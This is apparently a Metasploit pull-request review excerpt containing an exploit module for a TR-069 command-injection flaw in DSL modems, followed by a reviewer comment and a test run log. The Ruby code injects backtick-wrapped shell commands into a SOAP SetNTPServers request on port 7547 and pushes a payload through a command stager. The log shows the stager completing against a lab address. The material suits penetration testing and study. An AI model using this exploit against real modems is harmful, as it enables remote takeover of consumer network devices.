modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb

```diff
@@ -0,0 +1,134 @@
+          [ 'URL', 'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/'],
+          [ 'URL', 'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759']
+        ],
+      'DisclosureDate' => 'Nov 07 2016',
+      'Privileged'     => true,
+      'Targets' =>
+        [
+          [ 'MIPS Big Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
+        OptBool::new('FORCE_EXPLOIT', [false, 'Force an attempt even if the check fails', nil])
+      ], self.class)
+
+  end
+
+  def set_new_ntp_server(cmd)
+    template = "<?xml version=\"1.0\"?>"
+    template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    template << " <SOAP-ENV:Body>"
+    template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
+    template << "   <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
+    template << "   <NewNTPServer2></NewNTPServer2>"
+    template << "   <NewNTPServer3></NewNTPServer3>"
+    template << "   <NewNTPServer4></NewNTPServer4>"
+    template << "   <NewNTPServer5></NewNTPServer5>"
+    template << "  </u:SetNTPServers>"
+    template << " </SOAP-ENV:Body>"
+    template << "</SOAP-ENV:Envelope>"
+
+    template % cmd
+  end
+
+  def execute_command(cmd, opts)
+    uri = '/UD/act?1'
+    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
+    injected_data = set_new_ntp_server(cmd)
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'ctype' => "text/xml",
+        'method' => 'POST',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+        'data' => injected_data
+      }, 2)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
+      })
+    rescue ::Rex::ConnectionError
+      vprint_error("A connection error has occured")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res and res.code == 404 and res.body =~ /home_wan\.htm/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Checking...")
+
+    if check == Exploit::CheckCode::Appears
+      print_status("#{peer} - Appears vulnerable")
+      execute_cmdstager({:flavor => :echo})
```

Comment:
https://github.com/rapid7/metasploit-framework/pull/7626/commits/657d52951b1c12cd4eaf056ea2470f078c23d76d switches to printf for space (much smaller than echo) and avoids the echo problem you saw. Give that a shot, @m-1-k-3 ?

```
[*] 192.168.145.129:7547 - Checking...
[*] 192.168.145.129:7547 - Appears vulnerable
[*] Command Stager progress -   8.81% done (63/715 bytes)
[*] Command Stager progress -  17.62% done (126/715 bytes)
[*] Command Stager progress -  26.43% done (189/715 bytes)
[*] Command Stager progress -  35.24% done (252/715 bytes)
[*] Command Stager progress -  44.06% done (315/715 bytes)
[*] Command Stager progress -  52.45% done (375/715 bytes)
[*] Command Stager progress -  60.84% done (435/715 bytes)
[*] Command Stager progress -  69.23% done (495/715 bytes)
[*] Command Stager progress -  77.76% done (556/715 bytes)
[*] Command Stager progress -  86.29% done (617/715 bytes)
[*] Command Stager progress -  92.87% done (664/715 bytes)
[*] Command Stager progress - 100.00% done (715/715 bytes)
[*] Exploit completed, but no session was created.
```